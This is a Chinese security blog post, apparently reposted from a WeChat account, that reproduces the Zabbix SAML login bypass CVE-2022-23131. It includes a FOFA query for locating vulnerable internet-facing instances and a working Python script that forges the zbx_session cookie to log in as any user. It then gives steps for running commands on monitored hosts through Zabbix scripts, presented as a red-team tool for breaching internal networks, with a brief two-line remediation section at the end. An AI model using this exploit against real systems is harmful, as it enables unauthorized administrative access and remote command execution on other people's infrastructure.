【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网

admin 2022年4月23日00:10:58安全文章评论13 views1925字阅读6分25秒阅读模式

近期RCS-TEAM的团队的安全大佬们积极的为2022年HW进行准备工作,同时RCS-TEAM安全实验室也在抓紧验证红队工具、WebShell流量特征、近期新增的木马特征并通过机器学习完善特征模型 进而有效发现异常流量、异常行为。推动人工智能在网络安全领域的应用。


|0x0 团队介绍

RedCodeSecurity Team安全团队 & 安全实验室 以及安服团队,是由安全头部企业(奇安信、绿盟、360、深信服、启明等)、互联网头部企业、安全从业人员(渗透测试、安服、等保、重保、HW、代码审计、应急响应、安全巡检、安全产品代理等)、架构师、网络专家、运维专家、人工智能专家、大数据专家组建的一只安全队伍,核心业务涉及安服、渗透、等保、解决方案、以及企业内训、同时我们根据合作伙伴的需求、以及在职人员提升的需求推出安全相关的教育培训业务为安全厂商输送人才。


|0x1 漏洞介绍

CVE-2022-23131_Zabbix登录绕过漏洞

Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该监控系统被广泛的应用在运维监控体系中,该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用SAML SSO身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对Zabbix前端的管理员访问权限。参考资料: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202201-1030


此漏洞危害 红队可以利用该漏洞打穿内网,对于培训机构快餐式培养出来的所谓安全工程师缺乏对系统架构、网络图谱、运维体系的整体理解,所以说最大的漏洞并非是系统安全漏洞以及Web等漏洞,而是人!安全演练是演习不是演戏。


|0x2 漏洞复现

fofa关键字:app="ZABBIX-监控系统" && body="saml"

【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网


|0x3 漏洞验证

import requestsimport reimport urllib.parseimport base64import jsonimport sys def exp(target, username):  resp = requests.get(url=target, verify=False)  cookie = resp.headers.get("Set-Cookie")
zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8') base64_decode_data = base64.b64decode(url_decode_data)
decode_to_str = str(base64_decode_data, encoding='utf-8')
to_json = json.loads(decode_to_str)
tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
payloadJson = json.dumps(tmp_ojb) print("decode_payload:", payloadJson)
payload = urllib.parse.quote(base64.b64encode(payloadJson.encode())) print("zbx_signed_session:", payload)

if __name__ == "__main__": if len(sys.argv) != 3: print("argv error") exit(0) target = sys.argv[1] username = sys.argv[2]
exp(target, username)

【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网

【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网

然后再进行URL Encode


【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网


绕过登录

【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网

|0x4 漏洞利用

执行命令


【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网


找到Administration--> Scripts 创建新的脚本,这里我创建的ifconfig

【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网


在监控中找到最新数据,然后筛选出来你想执行的主机组,点击主机名执行对应命令


【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网


|0x5 漏洞修复

1、禁用SAML身份验证功能

2、升级到安全版本

【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网


|0x6 关注我们


微信扫码关注


RCS-TEAM 安全技术分享②群

【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网

原文始发于微信公众号(小白嘿课):【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日00:10:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【漏洞复现】红队利器!蓝队不注意非常容易被打穿从而拿下整个内网 http://cn-sec.com/archives/928743.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: